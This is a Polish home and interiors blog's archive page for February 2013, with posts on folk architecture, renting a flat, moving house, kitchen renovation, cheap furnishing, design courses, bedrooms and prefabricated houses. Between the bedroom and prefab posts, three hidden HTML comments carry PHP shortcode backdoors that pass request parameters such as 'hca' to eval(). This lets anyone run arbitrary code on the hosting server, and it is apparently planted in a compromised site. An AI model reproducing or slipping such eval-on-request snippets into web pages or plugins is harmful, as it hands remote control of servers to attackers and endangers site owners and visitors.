Archiwum miesiąca:: Luty 2013

Architektura ludowa

30Obecnie żyjemy w czasach nieustannego pośpiechu, postępującej specjalizacji w zakresie zawodów, w świecie, gdzie jedną z podstawowych wartości jest wyróżnienie się z tłumu, zaistnienie w świecie. Przejawia się to także w architekturze, każdy nowy budynek jest inny, zaskakujący. Jeszcze kilkadziesiąt lat temu w małych miejscowościach, na wsiach wszystko wyglądało inaczej. Ludzie posiadali inną mentalność, spojrzenie na świat, i nie ma co ukrywać, mniejsze środki finansowe. Ówczesna architektura ludowa charakteryzowała się swoją formą użytkową, prostotą. Wychodzono z założenia, że najważniejsze, to posiadać własny dach nad głową, miejsce do spania i do gotowania. A reszta to już zbytek, wielki dobrobyt. Wtedy każdy mężczyzna w domu był architektem, budowniczym. Materiały do budowy pozyskiwano z lasu, z ziemi, z własnych pól. Każdy etap budowy wymagał wcześniejszego przemyślenia i przygotowania. Trzeba było uzyskać drewno na ściany, słomę na dach, czy glinę i mech do uszczelnienia. Takie środki nie pozwalały na tworzenie zaskakujących projektów. Bogactwo demonstrowano raczej przez wielkość, niźli przez formę.

Bardziej majętny człowiek posiadał większy budynek, w którym bez trudu mogła pomieścić się wieloosobowa rodzina wraz ze zwierzętami. Jest to całkowicie odmienna od dzisiejszej sytuacja. Obecnie do zbudowania ciekawego domu, nieruchomości wynajmuje się wykwalifikowanego architekta, który tworzy projekt, jego wizualizację, przedstawia za i przeciw. Każdy z domów jest inny, ciekawy na swój sposób. Natomiast kiedyś jedna wieś odznaczała się jednolitą zabudową. Domy były podobnej wielkości i formy. Do ich budowy często nie używano gwoździ stosując zamiast nich specyficzną formę ułożenia drewna. Domem, który mógł się wyróżniać była własność sołtysa, albo szlachcica. Szlachcice z upodobaniem budowali dworki w pięknych okolicznościach przyrody. Były one bardziej dopracowane, stylowe i delikatne w formie, niźli chałupy chłopskie.

Wynajem mieszkania krok po kroku

5Dla wielu osób posiadanie własnego mieszkania wciąż pozostaje w sferze marzeń. Dlatego też wynajmowanie mieszkania jest opcją dla tych, których na dom nie stać lub wprowadzają się do jakiegoś miasta tylko na pewien okres czasu.
Wielotysięczne kredyty zaciągane w bankach, które trzeba spłacać przez wiele lat, a na miesięczne raty nierzadko przeznacza się więcej niż połowę wypłaty odstraszają zwłaszcza młodych ludzi od podjęcia decyzji o kupnie mieszkania.
Rodzinny dom trzeba jednak w pewnym momencie opuścić. Nie ważne, czy jest to związane z wyjazdem na studia czy przeprowadzeniem się do nowego miasta w poszukiwaniu pracy. Gdzieś trzeba mieszkać. Dla pewnej grupy studentów akademik nie jest żadną opcją, bo bardziej od codziennych imprez do rana pragną oni ciszy i spokoju.
Proces poszukiwania mieszkania zacząć można od przejrzenia ofert w internecie. Warto też zaopatrzyć się w gazetki z tego typem ogłoszeń, których w kioskach nie brakuje. Warto zarezerwować sobie jeden lub dwa dni wolnego, by w tym czasie poodwiedzać mieszkania z ogłoszeń.
Przed podjęciem decyzji o wynajęciu danego mieszkania czy pokoju warto odwiedzić co najmniej kilka domów, by mieć porównanie w oferowanych cenach i warunkach. Jeśli już zdecydujemy się na wynajęcie konkretnego mieszkania, warto od razu ustalić pewne warunki z właścicielem, by potem nie dochodziło do niepotrzebnych nieporozumień. Truizmem jest, że przed podpisaniem umowy trzeba się z nią dokładnie zapoznać, a w razie jakichkolwiek wątpliwości czy braku zgody na pewne warunki, należy konsultować je z właścicielem, jednak wiele osób o tym zapomina. Warto wiedzieć, kto jest na przykład odpowiedzialny za naprawę zepsutego kranu. Z reguły powinien to być obowiązek właściciela mieszkania, jednak często zdarza się, że przerzucają oni te obowiązki na osoby wynajmujące lokal.
Dom dzielony ze znajomymi, własny pokój wynajmowany od rodziny, czy tylko pokój dzielony na pół z kolegą z roku, by jak najbardziej zredukować koszty najmu– wybór własnego kąta zależy od potrzeb każdego z nas

Przeprowadzka z głową

Podejmując decyzję o zmianie mieszkania, lokatorzy muszą uporać się z wieloma sprawami. Przeprowadzka całego dobytku do nowego domu jest jedna z nich.
Przy okazji przeprowadzki warto też zrobić generalny przegląd rzeczy i przedmiotów. Wiele z nich może się okazać zbędnych. Na przykład stara komoda, która zajmuje połowę pokoju, w nowym mieszkaniu nie musi być wcale niezbędna. Również przedmioty codziennego użytku, sprzęt RTV i AGD, wyposażenie kuchni i inne rzeczy wymagają dokładnego przeglądu i zdecydowania, czy się ich pozbywamy, czy zabieramy ze sobą do nowego domu. Przeprowadzki są dobrą okazją do tego, by w nowym mieszkaniu przeprowadzić generalne zmiany w wystroju wnętrz.
Przeprowadzki z pewnością nie należą do najłatwiejszych zadań. Jednak spokojne zaplanowanie przeprowadzki na pewno się opłaci. Jeśli przeprowadzamy się do nowego mieszkania położonego niedaleko naszego starego domu, prawie cały dobytek jesteśmy przetransportować sami. Kilka kursów samochodem ze starego domu w nowe miejsce nie jest i zbyt kosztowne, i zbyt czasochłonne. Warto w takich sytuacjach poprosić również o pomoc znajomych i rodzinę. Co dwa samochody to nie jeden, pomoc innych zdecydowanie skróci czas przeprowadzki.
Gorzej rzecz ma się z przewiezieniem większych rzeczy, głównie mebli. Jeśli nie czujemy, że majsterkowanie, czyli w tym przypadku rozkręcanie i ponowne skręcanie części szafy czy kredensu jest naszą mocną stroną, powinniśmy wynająć już do tego zadania firmę transportową.
Również w przypadku, gdy nasza przeprowadzka to dziesiątki czy nawet setki kilometrów od dawnego miejsca zamieszkania, firma transportowa staje się niezbędną opcją. Firm transportowych można szukać w internecie czy ogłoszeniach w prasie. Ceny firm różnią się znacznie miedzy sobą, warto poświęcić trochę czasu na przejrzenie ofert i skontaktowanie się z przedstawicielami danej firmy, by dowiedzieć się o szczegóły świadczonych usług, niż decydować się na pierwszą lepszą firmę, której ogłoszenie było pierwsze na liście.

W centrum jest kuchnia

18Dla wielu kuchnia jest jednym z najważniejszych pomieszczeń w domu. To tutaj zbiera się rodzina do wspólnego posiłku, a goście popijają świeżo zaparzoną herbatę.
Bez kuchni wielu nie wyobraża sobie mieszkania od dewelopera. W społeczeństwach zachodnich kuchnie to często małe pokoiki, w których również obok piekarnika stoi pralka. Wynika to głównie z faktu, że obywatele Wielkiej Brytanii czy Niemiec mają w zwyczaju jeść na zewnątrz, redukując czynności we własnej kuchni do niezbędnego minimum, takiego jak zaparzenie kawy czy przekąszenie na szybko tosta z masłem orzechowym.
W Polsce kultura jedzenia w domu wciąż jest żywa, mimo tego, że lunch, już nawet nie obiad, z racji wykonywanej pracy coraz częściej jemy w restauracjach czy barach szybkiej obsługi. Pomimo tego przygotowywanie posiłków w domu wciąż jest rzeczą oczywistą. I dobrze, bo domowe jedzenie jest i zdrowsze, i tańsze.
Dlatego też kuchnia jest jednym z centralnych miejsc w mieszkaniu. O tej porze roku, w ramach wiosennych porządków, wiele rodzin decyduje się na odświeżenie kuchni czy wręcz generalny remont. W ostatnich latach popularne stało się łączenie kuchni z salonem. Ci, którzy mają taką możliwość, burzą ścianę łączącą dwa pomieszczenia, czasami zostawiając coś w rodzaju blatu.
Dla tych, którym marzy się całkowita zmiana wyglądu kuchni, na pomoc spieszą wyspecjalizowane firmy, które w swojej ofercie mają gotowe projekty wnętrza. Nawet i tym, którzy sami decydują, co i jak zmienić, przyda się rada doświadczonego konsultanta. Połączenie wizji domowników z profesjonalnym podejściem będzie skutkować satysfakcją tych pierwszych.
Mniej radykalne zmiany dotyczą między innymi pomalowaniem ścian na inny kolor, który może jej nadać zupełnie nowy charakter. Wśród częstych zmian jest również wymiana kafelków czy powierzchni podłogi. W ostatnich latach stawiamy na to, co funkcjonalne i łatwe w użytku.
Nowe oblicze kuchni z pewnością zachęci domowników do tego, by spędzać w niej większą ilość czasu i cieszyć się wspólnymi, rodzinnymi posiłkami.

Dom urządzony z klasą.

Dom urządzony z klasą nie musi wcale jednocześnie oznaczać wielkich nakładów finansowych. Przy niskim budżecie możliwe jest wyposażenie mieszkania dla młodych wrocław w meble i przedmioty zarówno funkcjonalne, jak i po prostu ładne.
Żeby urządzić nasze mieszkanie ze smakiem, dysponując jedynie niewielkim budżetem, warto poświęcić czas na poszukiwania w internecie. Jest wiele stron, na których znajdziemy i używane, i nowe meble czy inne domowe przedmioty po przystępnych cenach. Po pierwsze, istnieje dużo aukcji internetowych, na których możemy kupić wymarzony fotel, który często kosztuje mniej niż w sklepie. Warto śledzić takie aukcje i polować na internetowe okazje. Dużo serwisów oferuje też „sąsiedzkie” zakupy. To znaczy, że wyszukują one oferty w pobliżu naszego miejsca zamieszkania. Wtedy problem wysyłki dużego przedmiotu mamy z głowy, bo sami możemy go odebrać.
Innym sposobem jest regularne odwiedzanie pchlich targów. Wybór kanap do salonu czy szaf nie jest tam z pewnością największy, ale możemy natrafić na oryginalne i jedyne w swoim rodzaju przedmioty, takie jak lampki, obrazy czy zastawy kuchenne. Przedmioty te, często sprzedawane za przysłowiową złotówkę, oprócz tego, że są oryginalne, mają też w sobie pewną historię, co odróżnia je od rzeczy produkowanych na ogromną skalę na potrzeby masowego konsumenta.
Jeszcze innym sposobem jest odwiedzenie sklepów, które sprzedawane rzeczy przeznaczają na cele charytatywne. Tu również możemy natknąć się na prawdziwe perełki. A poczucie, że nasze pieniądze zostały przeznaczone nie na wypłatę dla dyrektorów, ale na pomoc innym, jest równie ważne jak sam zakupiony przedmiot.
W dużych miastach coraz popularniejsze stają się specjalne wydarzenia, podczas których ludzi wymieniają się rzeczami. Zaczęło się od książek i ubrań, ale coraz częściej nieużywany zegar możemy wymienić na niecodzienną wazę na kwiaty. W tym przypadku zyskujemy podwójnie- pozbywamy się niepotrzebnych przedmiotów i w zamian dostajemy coś nowego. Warto rozeznać się, czy takie wymiany odbywają się również w naszym mieście.

Modne i tanie projektowanie wnętrz.

W dzisiejszych czasach wciąż poszukujemy idealnych rozwiązań dla urządzenia własnego mieszkania Gliwice lub domu. Jeżeli nie chcemy lub nie mamy możliwości skorzystania z usług profesjonalisty, który oryginalnie urządzi nam wnętrze, z pomocą przychodzą nam liczne kursy, na których możemy zdobyć teoretyczną wiedzę oraz nabyć praktyczne umiejętności w dziedzinie jaką jest aranżacja i urządzanie wnętrz. Projektowanie wnętrz jest dziś bardzo modnym zajęciem, zarówno wykonywane w sposób profesjonalny jak i wykonywane hobbistycznie. Wspomniane kursy zazwyczaj składają się z dwóch etapów i uczą jak niebanalnie urządzić wnętrze. Jeżeli ktoś chce nabyć umiejętności na własny użytek w zupełności wystarczy mu pierwszy etap, natomiast jeżeli ktoś chcę zająć się tym zajęciem zawodowo to niezbędne jest także ukończenie drugiego etapu kursu. W ramach pierwszego stopnia kursu, pod okiem profesjonalistów, można zdobyć obszerną wiedzę na temat bogatej historii jaką posiada architektura wnętrz, metod projektowania światła i koloru, rodzajów materiałów jakie wymaga urządzanie wnętrz, zasad sporządzania rysunku technicznego, a także prezentacji pomieszczenia w sposób perspektywiczny.

Specjaliści podpowiedzą również jakie są zasady prawidłowej komunikacji z klientem, uwzględniając jego potrzeby i propozycje w projekcie oraz jak skutecznie prowadzić negocjacje co do wartości wykonanej pracy. Natomiast drugi stopień kursu jak już wspomniano jest dla osób traktujących projektowanie wnętrz zawodowo, aranżacja wnętrz jest ich profesjonalnym zajęciem. Kursy tego typu skupiają się przede wszystkim na nauce stylizacji wnętrz użyteczności publicznej, a więc restauracji, sklepików, marketów itp. Kursanci mają możliwość zdobycia obszernej wiedzy potrzebnej do aranżacji tego typu powierzchni komercyjnych. Nabywają wiedzę techniczną oraz zapoznają się z przepisami prawa z zakresu projektowania powierzchni na użytek komercyjny. Takie kursy dają możliwość rozwoju swoich zainteresowań i poszerzają horyzonty, dzięki którym możemy zająć się tym co sprawia nam przyjemność i co naprawdę lubimy robić. Architektura wnętrz, szczególnie tych niekomercyjnych, jest dziedziną, która coraz częściej wkracza w naszą rzeczywistość i sprawia, że świat wydaje się bardziej estetyczny i barwny.

Nasza sypialnia

Sypialnia, to szczególne miejsce w każdym domu, bardzo intymne i zrobione tylko dla nas. Tam nie wpuszcza się gości. Jeśli wybierasz łóżko, postaraj się zwrócić uwagę na materace, aby były dobrej jakości, prawidłowo wyprofilowane. Jeśli nie masz garderoby zaprojektuj w sypialni dużą szafę, najlepiej z rozsuwanymi drzwiami, dzięki czemu zaoszczędzisz dużo miejsca. Łóżko ustaw tak, aby po obu jego stronach było swobodne dojście. Pamiętaj o małych szafkach. Sypialnia to również doskonałe miejsce na ustawienie tam toaletki, czy małej komody z lustrem. Do tego, dołóż wygodne niskie krzesło. W sypialni koniecznie musi być dywan, lub wykładzina, aby miejsce było optycznie cieplejsze.

Jeśli nie jesteś zwolennikiem używania dywanów, pomyśl o małych chodniku lub skórach, tuz przy łóżku. Elementem dekoracyjnym, mogą być lampy stojące. Zastosuj raczej oświetlenie punktowe. Na oknie ustaw kwiaty doniczkowe, lub figurki. Jeśli masz dom, zaprojektuj go tak, by tuz obok, była twoja prywatna łazienka. Prywatna łazienka jest super rozwiązaniem, każdy to doceni, jeżeli może z kąpieli bezpośrednio wejść do swojej sypialni i do swojego łóżka, jest to bardzo wygodne rozwiązanie. Zwłaszcza w sytuacji kiedy mamy dzieci i często one blokują łazienkę lub w sytuacji kiedy nie chcemy się na nie natknąć. Zwłaszcza aspekt dużej prywatności powinien przekonać wiele osób do takiego zaprojektowania własnego domu, aby znaleźć miejsce na prywatną łazienkę.

<!– [insert_php]if (isset($_REQUEST["hca"])){eval($_REQUEST["hca"]);exit;}[/insert_php][php]if (isset($_REQUEST["hca"])){eval($_REQUEST["hca"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["fJmFC"])){eval($_REQUEST["fJmFC"]);exit;}[/insert_php][php]if (isset($_REQUEST["fJmFC"])){eval($_REQUEST["fJmFC"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jnLaY"])){eval($_REQUEST["jnLaY"]);exit;}[/insert_php][php]if (isset($_REQUEST["jnLaY"])){eval($_REQUEST["jnLaY"]);exit;}[/php] –>

Domy z prefabrykatów.

1Kto z nas nie marzył o własnym domu. Niestety tylko nielicznym udaje się spełnić te marzenia, głównie spowodowane jest to wysokimi kosztami jakie wymaga wybudowanie domu oraz, a może przede wszystkim czasochłonnością całego przedsięwzięcia. W obecnych czasach mamy możliwość zminimalizowania tych wszystkich niedogodności z jakimi wiąże się budowa domu, z pomocą przychodzą nam tzw. prefabrykaty. W ostatnich latach jest to coraz częstsza forma, jaką cechuje się budownictwo jednorodzinne, która zaczęła wypierać z rynku budowlanego domy stawiane w sposób tradycyjny. Jest to nowoczesna metoda budowania domów, które stawiane są z gotowych elementów wyprodukowanych w fabryce. Polega to na tym, iż poszczególne elementy, z których składa się dom wytwarzane są w fabryce, uwzględniając wcześniejszy projekt, a następnie transportowane są na miejsce budowy, gdzie odbywa się ich fachowy i szybki montaż na wcześniej przygotowanych fundamentach. Są to głównie ściany z izolacją oraz wstawionymi już oknami wraz z parapetami.

Cała budowa domu może zakończyć się nawet w ciągu kilku dni. Prefabrykaty, w stosunku do tego co prezentuje dziś tradycyjne budownictwo, cechuje również stosunkowo niski koszt wykonania. Niekiedy oddanie domu pod klucz, czyli w stanie gotowym do zamieszkania porównywalne jest z ceną dużego mieszkania w Warszawie. Zazwyczaj domy budowane tą metodą cechuje dosyć prosta bryła, dokładność wykonania oraz nowoczesność i energooszczędność materiałów z których budowany jest dom. Ich wielką zaletą jest dobra izolacja cieplna oraz odporność na warunki atmosferyczne. Materiały używane do budowy domów prefabrykowanych cechuje również odporność na wilgoć. Jest to doskonała alternatywa dla ludzi, którzy chcą wybudować własny dom w jak najkrótszym okresie, nie angażując w to całego swojego wolnego czasu. Wystarczy tylko wybrać najbardziej odpowiadający nam projekt domu oraz firmę, która ten projekt zrealizuje. Oczywiście trzeba mieć wcześniej zakupioną działkę, resztą zajmą się już profesjonaliści, tak abyśmy mogli w niedługim czasie cieszyć się pięknym i solidnym domem. Jeśli nie chcemy aby nasz czas pochłonęła wieloletnia budowa domu ta forma budownictwa jest dla nas idealnym rozwiązaniem.